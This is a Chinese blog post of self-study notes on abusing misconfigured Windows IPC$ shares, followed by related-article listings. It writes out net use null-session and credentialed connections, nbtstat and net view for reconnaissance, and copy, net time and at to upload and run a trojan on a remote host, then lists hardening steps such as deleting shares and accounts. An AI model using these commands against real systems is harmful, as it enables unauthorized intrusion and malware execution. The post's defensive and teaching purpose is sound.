windows上IPC配置不当利用以及防护

最新推荐文章于 2021-02-17 20:49:40 发布
最新推荐文章于 2021-02-17 20:49:40 发布
阅读量546 收藏
点赞数
分类专栏: 计算机组装与维修 信息安全 文章标签: windows ipc copy 上传 漏洞利用
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_27607539/article/details/76020389
版权
本文介绍了如何通过空连接和非空连接方式访问远程Windows主机,包括利用IPC$共享进行访问、删除连接、获取用户名等操作,并讨论了上传文件、运行木马的方法。此外,还提供了防御措施,如删除多余账户和不必要的共享。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

主要都是看这篇文章的http://blog.youkuaiyun.com/bytxl/article/details/46790995
这里自己总结一下,因为没有环境实战,也没有实战经验,所以就理理思路。

首先,
建立空连接

net use \\ip\ipc$  ""  /user:""

或者非空连接

net use \\ip\ipc$  "password"  /user:"username"

这里顺便讲一下删除连接

net use \\ip\ipc$ /del

当然建立空连接的时候可以通过某些方法得到用户名和密码,具体我不会做,只知道这个可以获得用户名。

nbtstat -A \\ip

然后查看目标主机上有哪些共享目录

net view \\ip

接着就是往共享目录上上传文件(木马后门),当然你得有写入权限,至于权限的获取我并不会。

copy 要复制的文件及路径  目的路径

最后当然是运行这个文件
获取远程主机的时间

net time \\ip

用at运行刚才上传的文件,运行时间是远程主机的时间

at  \\ip  时间  程序名

好吧at命令似乎不支持了,改天再尝试。

防护主要从两个方面,一个是删除多余的账户,另一个是删除默认共享。
删除多余的账户可以参考
http://blog.youkuaiyun.com/qq_27607539/article/details/76019992
这个方法。
删除不必要的共享可以用

net share

查看自己有哪些共享,然后用

net share 共享名 /del

删除掉,更狠一点的可以直接禁用server服务:

net stop server /f
[网络安全自学篇] 四十八.Cracer第八期——(1)安全术语、Web渗透流程、Windows基础、注册表及黑客常用DOS命令
杨秀璋的专栏
02-21 2万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了微软证书漏洞(CVE-2020-0601),并详细讲解了Windows验证机制、可执行文件签名复现及HTTPS劫持。本文将分享另一个主题——Cracer教程,第一篇文章将详细讲解安全术语、Web渗透流程和Windows基础、注册表及黑客常用DOS命令。基础性文章,希望对您有所帮助。
windows下的IPC实现,已经过测试
mjp_mjp的专栏
03-30 1965
// modify: Jason 2015-01-16  // 进程通信助手,已经测试 // console.cpp中测试过,两个进程可以正常通信 #pragma once #ifndef IPC_H #define IPC_H // Definitions //#define IPC_BLOCK_COUNT 512 //#define IPC_BLOCK_
海康ipc配置管理
08-23
海康ipc管理
linux下IPC配置
s467626472的博客
09-23 992
ipc
详解Redis数据库配置不当遭恶意入侵过程
chuisou1495的博客
08-03 289
Redis数据库简介 Redis(REmote DIctionary Server)是一款开源、支持网络、基于内存的高级键值对(Key-Value)存储数据库,其使用C语言编写实现。Redis通常被称为数据结构服务器,因为数据库中键(Key)的值(Value)可以是字符串、哈希表、列表、集合、...
华为ipc配置工具_华为鸿蒙问世,彰显物联网王者之志
weixin_39760368的博客
11-29 1万+
8月9日,华为在其松山湖基地召开全球开发者大会,重磅推出了基于微内核的面向全场景的分布式操作系统——HarmonyOS鸿蒙。华泰证券TMT研究团队在进门财经路演时表示,鸿蒙系统的发布,一举打破了单个智能终端的硬件局限,为实现万物互联奠定了系统基础。5G网正成为华为核心能力的输出口,看好华为引领智能终端5G高速物联时代。一、华为开启万物互联新时代8月9日,华为在其松山湖基地召开全球开发者大...
mysql workbench 创建ipc_VIS设备接入——海康IPC配置
weixin_34486987的博客
02-17 672
VIS设备接入过程中,需要在IPC设备的配置界面,配置相关平台接入参数。分为以下3个步骤1、平台接入前提条件(1)创建对应的GB28181密码(注意海康设备对应非匿名密码),记录用户名和密码(2)创建IPC设备(创建设备过程中需要选择关联步骤(1)中的GB28181密码),并记录设备ID(3)记录SIP服务器IP和端口号2、IPC视频传输配置(IPC配置界面操作)该步骤相关配置需要使用摄像头web...
信息安全-终端安全-Windows安全配置
qq_38169894的博客
12-18 2221
Windows安全配置 一、关闭Windows远程注册表 01-安全风险:禁用危险的远程注册表,防止hacker远程控制自己的机器; 02-安全措施:cmd->regedit(注册编辑表)->HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/RemoteRegistry->右键删除 二、设置登录系统时不显示上次登录的用户 01-安全风险:用户名泄露,增强爆破成功的可能性 02-安全措施:控制面板->本地安全..
流光5.0 IPC探测
02-23
流光5.0通过模拟客户端连接,检查服务器的POP3服务是否存在配置不当、弱口令或其他漏洞。例如,它可能会尝试各种常见的默认密码或利用已知的安全漏洞,来确保你的邮件服务器安全无虞。 二、FTP探测 FTP(File ...
IPC入侵动画教程
04-18
1. **IPC漏洞分析**:学习识别和理解可能导致IPC安全问题的编程错误或配置不当,如权限设置过于宽松、未加密的数据传输、无验证的进程间通信等。 2. **攻击手段**:讲解如何利用IPC进行攻击,包括注入代码、修改...
流光5.0多功能探测工具:IPC/POP3/FTP/SQL高级扫描
IPC(Inter-Process Communication)探测功能是流光的一大特色,IPC主要指的是Windows操作系统中进程间通信的机制。流光的IPC探测可以帮助用户发现远程主机上的IPC共享,这通常包括默认共享如C$、D$等。在网络安全...
cpp-IPC是一个C库它使用Windows上的共享内存提供进程间通信
08-16
IPC是一个C 库,它使用Windows上的共享内存提供进程间通信
IPC网络摄像头修改工具 IPC测试配置工具
08-11
IPC测试配置工具是一款用于网络摄像机的远程配置和管理的软件。主要功能是探测设备,配置网络,配置单台设备,一键设IP,升级设备,以及显示各机器的端口等等,让你很方便的在PC端管理这些IPC设备。 设备发现:发现与软件运行PC同一个局域网内或者不同子网内的在线设备,并可以修改设备IP地址等信息。 参数配置:对单个设备进行参数配置配置参数模板,模板可用于批量参数配置。 批量参数配置:通过本地参数模板批量配置设备参数,方便于用户管理多个设备。 批量升级:一次对多台设备进行软件升级操作,简化用户操作。 辅助聚焦:用于辅助用户设置最佳的摄像机焦距。 镜头焦距、带宽及存储空间计算:用于帮助用户选择合适的摄像机镜头,估算网络带宽,计算所需存储空间。 镜头模拟:用于模拟观测物在摄像机镜头中的成像效果,以方便用户调试。
ipc$连接的脚本(windows)
11-21
ipc$连接虽然有些过时了,但是也可以看一下,我是菜鸡,大神勿喷。
JAVA进程间的通信方式(IPC
sindlly的博客
11-24 1万+
JAVA进程间通信的方法主要有以下几种:   (1)管道(Pipe):管道可用于具有亲缘关系进程间的通信,允许一个进程和另一个与它有共同祖先的进程之间进行通信。   (2)命名管道(named pipe):命名管道克服了管道没有名字的限制,除具有管道所具有的功能外,它还允许无亲缘关系进程间的通信。   (3)信号(Signal):信号是比较复杂的通信方式,用于通知接受进程有某种事件发生,除了
Windows IPC 连接详解
热门推荐
看不尽的尘埃——博客
01-19 1万+
前言 最近在看一些渗透测试的教程。打算把一些东西实践实践,加深一下印象! 今天就来看看IPC连接。虽然很老,但是很经典。 正文 什么是IPCIPC(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。   一、建立IPC连接 ...
Windows环境下的IPC
truewaylee的专栏
05-20 5641
Windows环境下的IPC1进程与内存保护    在Windows 16位环境下(Windows 3.1/3.2),所有Windows应用程序共享单一地址,任何进程都能够对这一空间中的内容(包括属于其他进程的内存)进行读写操作,甚至可存取操作系统本身的数据,这样就可能破坏其他程序的数据段代码。出于安全的考虑,Windows 32环境下每个进程都有自己的地址空间,一个WIN32进程不
创建IPC端口失败:拒绝访问
牛栏山矿泉水
08-10 3568
1、错误描述 2、错误原因 由于多次双击MySQL Workbench,导致该软件的端口被占用 3、解决办法 关闭所有的MySQL Workbench进程,重新打开一个
WIN10启用自带虚拟机软件Hyper-V以及使用该软件管理的虚拟机联网问题和文件传输问题
qq_27607539的博客
06-25 1万+
我用的系统语言是英文的,下面的一些按钮都用英文表示。 1.按键"'WIN'+'R'"输入"control"打开控制面板,"Programs"->"Program and Features"->"Turn Windows features on or off"; 2.勾选"Hyper-V"然后点击确定进行安装,重启之后就可以在开始菜单中找到Hyper-V进行使用了。 具体使用根据软件的
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值